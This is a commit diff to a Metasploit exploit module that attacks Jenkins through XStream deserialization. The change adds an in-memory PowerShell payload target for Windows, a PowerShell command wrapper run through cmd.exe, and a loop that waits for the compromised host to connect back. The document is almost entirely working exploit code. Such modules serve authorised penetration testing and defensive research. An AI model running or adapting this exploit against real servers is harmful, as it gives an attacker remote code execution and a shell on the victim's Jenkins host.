Add powershell payload to module

2018-01-16 14:30:02 +00:00 · 2018-01-16 14:30:02 +00:00 · 1c156c3d3c
parent 77e76a80a1
commit 1c156c3d3c
1 changed files with 25 additions and 1 deletions
--- a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
+++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
@ -43,6 +43,10 @@ class MetasploitModule < Msf::Exploit::Remote
          'Platform'   => 'python',
          'Arch'       => ARCH_PYTHON
        ],
+        ['PowerShell (In-Memory)',
+          'Platform'   => 'win',
+          'Arch'       => [ARCH_X86, ARCH_X64]
+        ],
        ['Linux (Dropper)',
          'Platform'   => 'linux',
          'Arch'       => [ARCH_X86, ARCH_X64]
@ -57,6 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote

    register_options([
      OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
+      OptString.new('PSH_PATH', [false, 'Path to powershell.exe', '']),
+      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for connect back", 30]),
      Opt::RPORT('8080')
    ])
    deregister_options('URIPATH')
@ -82,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote

  def exploit
    case target.name
-    when /Unix/, /Python/
+    when /Unix/, /Python/, /PowerShell/
      execute_command(payload.encoded)
    else
      execute_cmdstager
@ -99,6 +105,9 @@ class MetasploitModule < Msf::Exploit::Remote
      %W{python -c #{cmd}}
    when /Windows/
      %W{cmd.exe /c #{cmd}}
+    when /PowerShell/
+      psh_opts = { :remove_comspec => true, :wrap_double_quotes => true }
+      %W{cmd.exe /c #{cmd_psh_payload(cmd, payload_instance.arch.first, psh_opts)}}
    end

    # Encode each command argument with XML entities
@ -111,6 +120,21 @@ class MetasploitModule < Msf::Exploit::Remote
      'ctype'    => 'application/xml',
      'data'     => xstream_payload(cmd)
    )
+    wait_for_powershell_session
+  end
+
+  def wait_for_powershell_session
+    print_status "Waiting for exploit to complete..."
+    begin
+      Timeout.timeout(datastore['ListenerTimeout']) do
+        loop do
+          break if session_created?
+          Rex.sleep(0.25)
+        end
+      end
+    rescue ::Timeout::Error
+      fail_with(Failure::Unknown, "Timeout waiting for exploit to complete")
+    end
  end

  def xstream_payload(cmd)